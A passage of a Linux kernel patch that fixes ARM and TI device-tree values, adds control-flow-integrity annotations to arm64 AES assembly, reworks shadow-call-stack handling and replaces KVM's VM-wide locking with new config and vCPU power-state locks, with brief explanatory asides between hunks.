+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -215,10 +213,8 @@
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+ 			interrupts = <GIC_SPI 334 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 335 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 336 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 337 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -237,9 +233,8 @@
+ 			reg = <0 0x1004a800 0 0x400>;
+ 			interrupts = <GIC_SPI 338 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 339 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 341 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+diff --git a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+index edcf6b2718814..eb8690a6be168 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+@@ -354,7 +354,7 @@
+ 			     <193>, <194>, <195>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <87>;
++		ti,ngpio = <92>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 77 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 77 0>;
+@@ -371,7 +371,7 @@
+ 			     <183>, <184>, <185>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <88>;
++		ti,ngpio = <52>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 78 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 78 0>;
+diff --git a/arch/arm64/boot/dts/ti/k3-am625.dtsi b/arch/arm64/boot/dts/ti/k3-am625.dtsi
+index 887f31c23fef6..31b37abbb8d5c 100644
+--- a/arch/arm64/boot/dts/ti/k3-am625.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am625.dtsi
+@@ -96,7 +96,7 @@
+ 	L2_0: l2-cache0 {
+ 		compatible = "cache";
+ 		cache-level = <2>;
+-		cache-size = <0x40000>;
++		cache-size = <0x80000>;
+ 		cache-line-size = <64>;
+ 		cache-sets = <512>;
+ 	};
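The corrected value is also consistent with the other cache properties in the node: with 512 sets and 64-byte lines, 0x80000 bytes implies a 16-way set-associative L2, whereas the old 0x40000 would have implied only 8 ways. As a quick check (the 16-way figure is inferred from these numbers, not stated in the patch):

    /* cache-size = cache-sets * ways * cache-line-size
     *            = 512 * 16 * 64 = 524288 = 0x80000 bytes (512 KiB) */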
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+index 576dbce80ad83..b08a083d722d4 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
++++ b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+@@ -26,8 +26,9 @@
+ 
+ 	memory@80000000 {
+ 		device_type = "memory";
+-		/* 2G RAM */
+-		reg = <0x00000000 0x80000000 0x00000000 0x80000000>;
++		/* 4G RAM */
++		reg = <0x00000000 0x80000000 0x00000000 0x80000000>,
++		      <0x00000008 0x80000000 0x00000000 0x80000000>;
+ 	};
+ 
+ 	reserved-memory {
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a7.dtsi b/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
+index 331d89fda29d0..f1ebaec404fbc 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
+@@ -96,7 +96,7 @@
+ 	L2_0: l2-cache0 {
+ 		compatible = "cache";
+ 		cache-level = <2>;
+-		cache-size = <0x40000>;
++		cache-size = <0x80000>;
+ 		cache-line-size = <64>;
+ 		cache-sets = <512>;
+ 	};
+diff --git a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+index 603ddda5127fa..e9b36c419bec1 100644
+--- a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+@@ -1093,7 +1093,6 @@
+ 		ti,itap-del-sel-mmc-hs = <0xa>;
+ 		ti,itap-del-sel-ddr52 = <0x3>;
+ 		ti,trm-icp = <0x8>;
+-		ti,strobe-sel = <0x77>;
+ 		dma-coherent;
+ 	};
+ 
+diff --git a/arch/arm64/crypto/aes-neonbs-core.S b/arch/arm64/crypto/aes-neonbs-core.S
+index d427f4556b6eb..b2062eeee59e2 100644
+--- a/arch/arm64/crypto/aes-neonbs-core.S
++++ b/arch/arm64/crypto/aes-neonbs-core.S
+@@ -15,6 +15,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/assembler.h>
+ 
+ 	.text
+@@ -620,12 +621,12 @@ SYM_FUNC_END(aesbs_decrypt8)
+ 	.endm
+ 
+ 	.align		4
+-SYM_FUNC_START(aesbs_ecb_encrypt)
++SYM_TYPED_FUNC_START(aesbs_ecb_encrypt)
+ 	__ecb_crypt	aesbs_encrypt8, v0, v1, v4, v6, v3, v7, v2, v5
+ SYM_FUNC_END(aesbs_ecb_encrypt)
+ 
+ 	.align		4
+-SYM_FUNC_START(aesbs_ecb_decrypt)
++SYM_TYPED_FUNC_START(aesbs_ecb_decrypt)
+ 	__ecb_crypt	aesbs_decrypt8, v0, v1, v6, v4, v2, v7, v3, v5
+ SYM_FUNC_END(aesbs_ecb_decrypt)
+ 
+@@ -799,11 +800,11 @@ SYM_FUNC_END(__xts_crypt8)
+ 	ret
+ 	.endm
+ 
+-SYM_FUNC_START(aesbs_xts_encrypt)
++SYM_TYPED_FUNC_START(aesbs_xts_encrypt)
+ 	__xts_crypt	aesbs_encrypt8, v0, v1, v4, v6, v3, v7, v2, v5
+ SYM_FUNC_END(aesbs_xts_encrypt)
+ 
+-SYM_FUNC_START(aesbs_xts_decrypt)
++SYM_TYPED_FUNC_START(aesbs_xts_decrypt)
+ 	__xts_crypt	aesbs_decrypt8, v0, v1, v6, v4, v2, v7, v3, v5
+ SYM_FUNC_END(aesbs_xts_decrypt)
+ 
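These assembly entry points are reached from C through function pointers, and with CONFIG_CFI_CLANG every indirect call site verifies a type hash on the callee; SYM_TYPED_FUNC_START (from the newly included linux/cfi_types.h) emits that hash for an assembly function, while plain SYM_FUNC_START does not, so the indirect calls would trap. A self-contained analogue of the call-site check, in user space for illustration only:

    /* Under clang kCFI (-fsanitize=kcfi), the indirect call below compares
     * a hash derived from the op_t prototype against one stored at the
     * callee; an assembly callee must advertise the same hash, which is
     * what SYM_TYPED_FUNC_START arranges in the kernel. */
    #include <stdio.h>

    typedef int (*op_t)(int, int);

    static int add(int a, int b) { return a + b; }

    int main(void)
    {
        op_t op = add;
        printf("%d\n", op(2, 3));  /* indirect call: CFI-checked */
        return 0;
    }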
+diff --git a/arch/arm64/include/asm/debug-monitors.h b/arch/arm64/include/asm/debug-monitors.h
+index 7b7e05c02691c..13d437bcbf58c 100644
+--- a/arch/arm64/include/asm/debug-monitors.h
++++ b/arch/arm64/include/asm/debug-monitors.h
+@@ -104,6 +104,7 @@ void user_regs_reset_single_step(struct user_pt_regs *regs,
+ void kernel_enable_single_step(struct pt_regs *regs);
+ void kernel_disable_single_step(void);
+ int kernel_active_single_step(void);
++void kernel_rewind_single_step(struct pt_regs *regs);
+ 
+ #ifdef CONFIG_HAVE_HW_BREAKPOINT
+ int reinstall_suspended_bps(struct pt_regs *regs);
+diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
+index e2b45c937c58a..b5a8e8b3c691c 100644
+--- a/arch/arm64/include/asm/kvm_host.h
++++ b/arch/arm64/include/asm/kvm_host.h
+@@ -127,6 +127,9 @@ struct kvm_arch {
+ 	/* Mandated version of PSCI */
+ 	u32 psci_version;
+ 
++	/* Protects VM-scoped configuration data */
++	struct mutex config_lock;
++
+ 	/*
+ 	 * If we encounter a data abort without valid instruction syndrome
+ 	 * information, report this to user space.  User space can (and
+@@ -398,6 +401,7 @@ struct kvm_vcpu_arch {
+ 
+ 	/* vcpu power state */
+ 	struct kvm_mp_state mp_state;
++	spinlock_t mp_state_lock;
+ 
+ 	/* Cache some mmu pages needed inside spinlock regions */
+ 	struct kvm_mmu_memory_cache mmu_page_cache;
+diff --git a/arch/arm64/include/asm/scs.h b/arch/arm64/include/asm/scs.h
+index 8297bccf07845..5cd4d09bc69d7 100644
+--- a/arch/arm64/include/asm/scs.h
++++ b/arch/arm64/include/asm/scs.h
+@@ -9,15 +9,16 @@
+ #ifdef CONFIG_SHADOW_CALL_STACK
+ 	scs_sp	.req	x18
+ 
+-	.macro scs_load tsk
+-	ldr	scs_sp, [\tsk, #TSK_TI_SCS_SP]
++	.macro scs_load_current
++	get_current_task scs_sp
++	ldr	scs_sp, [scs_sp, #TSK_TI_SCS_SP]
+ 	.endm
+ 
+ 	.macro scs_save tsk
+ 	str	scs_sp, [\tsk, #TSK_TI_SCS_SP]
+ 	.endm
+ #else
+-	.macro scs_load tsk
++	.macro scs_load_current
+ 	.endm
+ 
+ 	.macro scs_save tsk
+diff --git a/arch/arm64/kernel/debug-monitors.c b/arch/arm64/kernel/debug-monitors.c
+index 3da09778267ec..64f2ecbdfe5c2 100644
+--- a/arch/arm64/kernel/debug-monitors.c
++++ b/arch/arm64/kernel/debug-monitors.c
+@@ -438,6 +438,11 @@ int kernel_active_single_step(void)
+ }
+ NOKPROBE_SYMBOL(kernel_active_single_step);
+ 
++void kernel_rewind_single_step(struct pt_regs *regs)
++{
++	set_regs_spsr_ss(regs);
++}
++
+ /* ptrace API */
+ void user_enable_single_step(struct task_struct *task)
+ {
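On arm64 the hardware step machine is driven by two bits: MDSCR_EL1.SS enables single-step, and the SS bit in the saved PSTATE requests one more instruction, which the CPU clears after each step. kernel_rewind_single_step() exists so a debugger that is asked to step while a step is already active can simply re-arm that bit, as the kgdb hunk below does. In essence (a simplification of what set_regs_spsr_ss() boils down to, with the bit name taken from the arm64 debug headers):

    regs->pstate |= DBG_SPSR_SS;  /* request one more stepped instruction */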
+diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S
+index e28137d64b768..3671d9521d4f5 100644
+--- a/arch/arm64/kernel/entry.S
++++ b/arch/arm64/kernel/entry.S
+@@ -272,7 +272,7 @@ alternative_if ARM64_HAS_ADDRESS_AUTH
+ alternative_else_nop_endif
+ 1:
+ 
+-	scs_load tsk
++	scs_load_current
+ 	.else
+ 	add	x21, sp, #PT_REGS_SIZE
+ 	get_current_task tsk
+@@ -845,7 +845,7 @@ SYM_FUNC_START(cpu_switch_to)
+ 	msr	sp_el0, x1
+ 	ptrauth_keys_install_kernel x1, x8, x9, x10
+ 	scs_save x0
+-	scs_load x1
++	scs_load_current
+ 	ret
+ SYM_FUNC_END(cpu_switch_to)
+ NOKPROBE(cpu_switch_to)
+@@ -873,19 +873,19 @@ NOKPROBE(ret_from_fork)
+  */
+ SYM_FUNC_START(call_on_irq_stack)
+ #ifdef CONFIG_SHADOW_CALL_STACK
+-	stp	scs_sp, xzr, [sp, #-16]!
++	get_current_task x16
++	scs_save x16
+ 	ldr_this_cpu scs_sp, irq_shadow_call_stack_ptr, x17
+ #endif
++
+ 	/* Create a frame record to save our LR and SP (implicit in FP) */
+ 	stp	x29, x30, [sp, #-16]!
+ 	mov	x29, sp
+ 
+ 	ldr_this_cpu x16, irq_stack_ptr, x17
+-	mov	x15, #IRQ_STACK_SIZE
+-	add	x16, x16, x15
+ 
+ 	/* Move to the new stack and call the function there */
+-	mov	sp, x16
++	add	sp, x16, #IRQ_STACK_SIZE
+ 	blr	x1
+ 
+ 	/*
+@@ -894,9 +894,7 @@ SYM_FUNC_START(call_on_irq_stack)
+ 	 */
+ 	mov	sp, x29
+ 	ldp	x29, x30, [sp], #16
+-#ifdef CONFIG_SHADOW_CALL_STACK
+-	ldp	scs_sp, xzr, [sp], #16
+-#endif
++	scs_load_current
+ 	ret
+ SYM_FUNC_END(call_on_irq_stack)
+ NOKPROBE(call_on_irq_stack)
+diff --git a/arch/arm64/kernel/head.S b/arch/arm64/kernel/head.S
+index 2196aad7b55bc..cdbbc95eb49d0 100644
+--- a/arch/arm64/kernel/head.S
++++ b/arch/arm64/kernel/head.S
+@@ -404,7 +404,7 @@ SYM_FUNC_END(create_kernel_mapping)
+ 	stp	xzr, xzr, [sp, #S_STACKFRAME]
+ 	add	x29, sp, #S_STACKFRAME
+ 
+-	scs_load \tsk
++	scs_load_current
+ 
+ 	adr_l	\tmp1, __per_cpu_offset
+ 	ldr	w\tmp2, [\tsk, #TSK_TI_CPU]
+diff --git a/arch/arm64/kernel/kgdb.c b/arch/arm64/kernel/kgdb.c
+index cda9c1e9864f7..4e1f983df3d1c 100644
+--- a/arch/arm64/kernel/kgdb.c
++++ b/arch/arm64/kernel/kgdb.c
+@@ -224,6 +224,8 @@ int kgdb_arch_handle_exception(int exception_vector, int signo,
+ 		 */
+ 		if (!kernel_active_single_step())
+ 			kernel_enable_single_step(linux_regs);
++		else
++			kernel_rewind_single_step(linux_regs);
+ 		err = 0;
+ 		break;
+ 	default:
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index 6ce6888cf73d6..35481d51aada8 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -146,6 +146,16 @@ int kvm_arch_init_vm(struct kvm *kvm, unsigned long type)
+ 	if (ret)
+ 		return ret;
+ 
++	mutex_init(&kvm->arch.config_lock);
++
++#ifdef CONFIG_LOCKDEP
++	/* Clue in lockdep that the config_lock must be taken inside kvm->lock */
++	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->lock);
++#endif
++
+ 	ret = kvm_share_hyp(kvm, kvm + 1);
+ 	if (ret)
+ 		goto out_free_stage2_pgd;
+@@ -324,6 +334,16 @@ int kvm_arch_vcpu_create(struct kvm_vcpu *vcpu)
+ {
+ 	int err;
+ 
++	spin_lock_init(&vcpu->arch.mp_state_lock);
++
++#ifdef CONFIG_LOCKDEP
++	/* Inform lockdep that the config_lock is acquired after vcpu->mutex */
++	mutex_lock(&vcpu->mutex);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
++	mutex_unlock(&vcpu->mutex);
++#endif
++
+ 	/* Force users to call KVM_ARM_VCPU_INIT */
+ 	vcpu->arch.target = -1;
+ 	bitmap_zero(vcpu->arch.features, KVM_VCPU_MAX_FEATURES);
+@@ -441,34 +461,41 @@ void kvm_arch_vcpu_put(struct kvm_vcpu *vcpu)
+ 	vcpu->cpu = -1;
+ }
+ 
+-void kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
++static void __kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
+ {
+-	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_STOPPED;
++	WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_STOPPED);
+ 	kvm_make_request(KVM_REQ_SLEEP, vcpu);
+ 	kvm_vcpu_kick(vcpu);
+ }
+ 
++void kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
++{
++	spin_lock(&vcpu->arch.mp_state_lock);
++	__kvm_arm_vcpu_power_off(vcpu);
++	spin_unlock(&vcpu->arch.mp_state_lock);
++}
++
+ bool kvm_arm_vcpu_stopped(struct kvm_vcpu *vcpu)
+ {
+-	return vcpu->arch.mp_state.mp_state == KVM_MP_STATE_STOPPED;
++	return READ_ONCE(vcpu->arch.mp_state.mp_state) == KVM_MP_STATE_STOPPED;
+ }
+ 
+ static void kvm_arm_vcpu_suspend(struct kvm_vcpu *vcpu)
+ {
+-	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_SUSPENDED;
++	WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_SUSPENDED);
+ 	kvm_make_request(KVM_REQ_SUSPEND, vcpu);
+ 	kvm_vcpu_kick(vcpu);
+ }
+ 
+ static bool kvm_arm_vcpu_suspended(struct kvm_vcpu *vcpu)
+ {
+-	return vcpu->arch.mp_state.mp_state == KVM_MP_STATE_SUSPENDED;
++	return READ_ONCE(vcpu->arch.mp_state.mp_state) == KVM_MP_STATE_SUSPENDED;
+ }
+ 
+ int kvm_arch_vcpu_ioctl_get_mpstate(struct kvm_vcpu *vcpu,
+ 				    struct kvm_mp_state *mp_state)
+ {
+-	*mp_state = vcpu->arch.mp_state;
++	*mp_state = READ_ONCE(vcpu->arch.mp_state);
+ 
+ 	return 0;
+ }
+@@ -478,12 +505,14 @@ int kvm_arch_vcpu_ioctl_set_mpstate(struct kvm_vcpu *vcpu,
+ {
+ 	int ret = 0;
+ 
++	spin_lock(&vcpu->arch.mp_state_lock);
++
+ 	switch (mp_state->mp_state) {
+ 	case KVM_MP_STATE_RUNNABLE:
+-		vcpu->arch.mp_state = *mp_state;
++		WRITE_ONCE(vcpu->arch.mp_state, *mp_state);
+ 		break;
+ 	case KVM_MP_STATE_STOPPED:
+-		kvm_arm_vcpu_power_off(vcpu);
++		__kvm_arm_vcpu_power_off(vcpu);
+ 		break;
+ 	case KVM_MP_STATE_SUSPENDED:
+ 		kvm_arm_vcpu_suspend(vcpu);
+@@ -492,6 +521,8 @@ int kvm_arch_vcpu_ioctl_set_mpstate(struct kvm_vcpu *vcpu,
+ 		ret = -EINVAL;
+ 	}
+ 
++	spin_unlock(&vcpu->arch.mp_state_lock);
++
+ 	return ret;
+ }
+ 
+@@ -585,9 +616,9 @@ int kvm_arch_vcpu_run_pid_change(struct kvm_vcpu *vcpu)
+ 	if (kvm_vm_is_protected(kvm))
+ 		kvm_call_hyp_nvhe(__pkvm_vcpu_init_traps, vcpu);
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	set_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags);
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	return ret;
+ }
+@@ -1202,7 +1233,7 @@ static int kvm_arch_vcpu_ioctl_vcpu_init(struct kvm_vcpu *vcpu,
+ 	if (test_bit(KVM_ARM_VCPU_POWER_OFF, vcpu->arch.features))
+ 		kvm_arm_vcpu_power_off(vcpu);
+ 	else
+-		vcpu->arch.mp_state.mp_state = KVM_MP_STATE_RUNNABLE;
++		WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_RUNNABLE);
+ 
+ 	return 0;
+ }
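The lock/unlock pairs under CONFIG_LOCKDEP above never protect any data; they are taken once at creation time purely so lockdep records the intended ordering (kvm->lock outside config_lock, and vcpu->mutex outside config_lock) and can then flag future violations even on paths that never actually nest the locks. The idiom in isolation, with hypothetical lock names:

    /* Prime lockdep with the documented order: take the locks once,
     * nested, then release them. Nothing is protected here. */
    static DEFINE_MUTEX(outer_lock);
    static DEFINE_MUTEX(inner_lock);

    static void record_lock_order(void)
    {
            mutex_lock(&outer_lock);
            mutex_lock(&inner_lock);   /* lockdep: inner nests inside outer */
            mutex_unlock(&inner_lock);
            mutex_unlock(&outer_lock);
    }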
+diff --git a/arch/arm64/kvm/guest.c b/arch/arm64/kvm/guest.c
+index 817fdd1ab7783..dd20b8688d230 100644
+--- a/arch/arm64/kvm/guest.c
++++ b/arch/arm64/kvm/guest.c
+@@ -951,7 +951,9 @@ int kvm_arm_vcpu_arch_set_attr(struct kvm_vcpu *vcpu,
+ 
+ 	switch (attr->group) {
+ 	case KVM_ARM_VCPU_PMU_V3_CTRL:
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 		ret = kvm_arm_pmu_v3_set_attr(vcpu, attr);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 		break;
+ 	case KVM_ARM_VCPU_TIMER_CTRL:
+ 		ret = kvm_arm_timer_set_attr(vcpu, attr);
+diff --git a/arch/arm64/kvm/hypercalls.c b/arch/arm64/kvm/hypercalls.c
+index 950e35b993d2b..1f5beebf62174 100644
+--- a/arch/arm64/kvm/hypercalls.c
++++ b/arch/arm64/kvm/hypercalls.c
+@@ -377,7 +377,7 @@ static int kvm_arm_set_fw_reg_bmap(struct kvm_vcpu *vcpu, u64 reg_id, u64 val)
+ 	if (val & ~fw_reg_features)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 
+ 	if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags) &&
+ 	    val != *fw_reg_bmap) {
+@@ -387,7 +387,7 @@ static int kvm_arm_set_fw_reg_bmap(struct kvm_vcpu *vcpu, u64 reg_id, u64 val)
+ 
+ 	WRITE_ONCE(*fw_reg_bmap, val);
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index ed12c5355afbb..c7e5f6a28c28b 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -850,7 +850,7 @@ static int kvm_arm_pmu_v3_set_pmu(struct kvm_vcpu *vcpu, int pmu_id)
+ 	struct arm_pmu *arm_pmu;
+ 	int ret = -ENXIO;
+ 
+-	mutex_lock(&kvm->lock);
++	lockdep_assert_held(&kvm->arch.config_lock);
+ 	mutex_lock(&arm_pmus_lock);
+ 
+ 	list_for_each_entry(entry, &arm_pmus, entry) {
+@@ -870,7 +870,6 @@ static int kvm_arm_pmu_v3_set_pmu(struct kvm_vcpu *vcpu, int pmu_id)
+ 	}
+ 
+ 	mutex_unlock(&arm_pmus_lock);
+-	mutex_unlock(&kvm->lock);
+ 	return ret;
+ }
+ 
+@@ -878,22 +877,20 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ {
+ 	struct kvm *kvm = vcpu->kvm;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!kvm_vcpu_has_pmu(vcpu))
+ 		return -ENODEV;
+ 
+ 	if (vcpu->arch.pmu.created)
+ 		return -EBUSY;
+ 
+-	mutex_lock(&kvm->lock);
+ 	if (!kvm->arch.arm_pmu) {
+ 		/* No PMU set, get the default one */
+ 		kvm->arch.arm_pmu = kvm_pmu_probe_armpmu();
+-		if (!kvm->arch.arm_pmu) {
+-			mutex_unlock(&kvm->lock);
++		if (!kvm->arch.arm_pmu)
+ 			return -ENODEV;
+-		}
+ 	}
+-	mutex_unlock(&kvm->lock);
+ 
+ 	switch (attr->attr) {
+ 	case KVM_ARM_VCPU_PMU_V3_IRQ: {
+@@ -937,19 +934,13 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ 		     filter.action != KVM_PMU_EVENT_DENY))
+ 			return -EINVAL;
+ 
+-		mutex_lock(&kvm->lock);
+-
+-		if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags)) {
+-			mutex_unlock(&kvm->lock);
++		if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags))
+ 			return -EBUSY;
+-		}
+ 
+ 		if (!kvm->arch.pmu_filter) {
+ 			kvm->arch.pmu_filter = bitmap_alloc(nr_events, GFP_KERNEL_ACCOUNT);
+-			if (!kvm->arch.pmu_filter) {
+-				mutex_unlock(&kvm->lock);
++			if (!kvm->arch.pmu_filter)
+ 				return -ENOMEM;
+-			}
+ 
+ 			/*
+ 			 * The default depends on the first applied filter.
+@@ -968,8 +959,6 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ 		else
+ 			bitmap_clear(kvm->arch.pmu_filter, filter.base_event, filter.nevents);
+ 
+-		mutex_unlock(&kvm->lock);
+-
+ 		return 0;
+ 	}
+ 	case KVM_ARM_VCPU_PMU_V3_SET_PMU: {
+diff --git a/arch/arm64/kvm/psci.c b/arch/arm64/kvm/psci.c
+index 7fbc4c1b9df04..5767e6baa61a2 100644
+--- a/arch/arm64/kvm/psci.c
++++ b/arch/arm64/kvm/psci.c
+@@ -62,6 +62,7 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	struct vcpu_reset_state *reset_state;
+ 	struct kvm *kvm = source_vcpu->kvm;
+ 	struct kvm_vcpu *vcpu = NULL;
++	int ret = PSCI_RET_SUCCESS;
+ 	unsigned long cpu_id;
+ 
+ 	cpu_id = smccc_get_arg1(source_vcpu);
+@@ -76,11 +77,15 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	 */
+ 	if (!vcpu)
+ 		return PSCI_RET_INVALID_PARAMS;
++
++	spin_lock(&vcpu->arch.mp_state_lock);
+ 	if (!kvm_arm_vcpu_stopped(vcpu)) {
+ 		if (kvm_psci_version(source_vcpu) != KVM_ARM_PSCI_0_1)
+-			return PSCI_RET_ALREADY_ON;
++			ret = PSCI_RET_ALREADY_ON;
+ 		else
+-			return PSCI_RET_INVALID_PARAMS;
++			ret = PSCI_RET_INVALID_PARAMS;
++
++		goto out_unlock;
+ 	}
+ 
+ 	reset_state = &vcpu->arch.reset_state;
+@@ -96,7 +101,7 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	 */
+ 	reset_state->r0 = smccc_get_arg3(source_vcpu);
+ 
+-	WRITE_ONCE(reset_state->reset, true);
++	reset_state->reset = true;
+ 	kvm_make_request(KVM_REQ_VCPU_RESET, vcpu);
+ 
+ 	/*
+@@ -108,7 +113,9 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_RUNNABLE;
+ 	kvm_vcpu_wake_up(vcpu);
+ 
+-	return PSCI_RET_SUCCESS;
++out_unlock:
++	spin_unlock(&vcpu->arch.mp_state_lock);
++	return ret;
+ }
+ 
+ static unsigned long kvm_psci_vcpu_affinity_info(struct kvm_vcpu *vcpu)
+@@ -168,8 +175,11 @@ static void kvm_prepare_system_event(struct kvm_vcpu *vcpu, u32 type, u64 flags)
+ 	 * after this call is handled and before the VCPUs have been
+ 	 * re-initialized.
+ 	 */
+-	kvm_for_each_vcpu(i, tmp, vcpu->kvm)
+-		tmp->arch.mp_state.mp_state = KVM_MP_STATE_STOPPED;
++	kvm_for_each_vcpu(i, tmp, vcpu->kvm) {
++		spin_lock(&tmp->arch.mp_state_lock);
++		WRITE_ONCE(tmp->arch.mp_state.mp_state, KVM_MP_STATE_STOPPED);
++		spin_unlock(&tmp->arch.mp_state_lock);
++	}
+ 	kvm_make_all_cpus_request(vcpu->kvm, KVM_REQ_SLEEP);
+ 
+ 	memset(&vcpu->run->system_event, 0, sizeof(vcpu->run->system_event));
+@@ -229,7 +239,6 @@ static unsigned long kvm_psci_check_allowed_function(struct kvm_vcpu *vcpu, u32
+ 
+ static int kvm_psci_0_2_call(struct kvm_vcpu *vcpu)
+ {
+-	struct kvm *kvm = vcpu->kvm;
+ 	u32 psci_fn = smccc_get_function(vcpu);
+ 	unsigned long val;
+ 	int ret = 1;
+@@ -254,9 +263,7 @@ static int kvm_psci_0_2_call(struct kvm_vcpu *vcpu)
+ 		kvm_psci_narrow_to_32bit(vcpu);
+ 		fallthrough;
+ 	case PSCI_0_2_FN64_CPU_ON:
+-		mutex_lock(&kvm->lock);
+ 		val = kvm_psci_vcpu_on(vcpu);
+-		mutex_unlock(&kvm->lock);
+ 		break;
+ 	case PSCI_0_2_FN_AFFINITY_INFO:
+ 		kvm_psci_narrow_to_32bit(vcpu);
+@@ -395,7 +402,6 @@ static int kvm_psci_1_x_call(struct kvm_vcpu *vcpu, u32 minor)
+ 
+ static int kvm_psci_0_1_call(struct kvm_vcpu *vcpu)
+ {
+-	struct kvm *kvm = vcpu->kvm;
+ 	u32 psci_fn = smccc_get_function(vcpu);
+ 	unsigned long val;
+ 
+@@ -405,9 +411,7 @@ static int kvm_psci_0_1_call(struct kvm_vcpu *vcpu)
+ 		val = PSCI_RET_SUCCESS;
+ 		break;
+ 	case KVM_PSCI_FN_CPU_ON:
+-		mutex_lock(&kvm->lock);
+ 		val = kvm_psci_vcpu_on(vcpu);
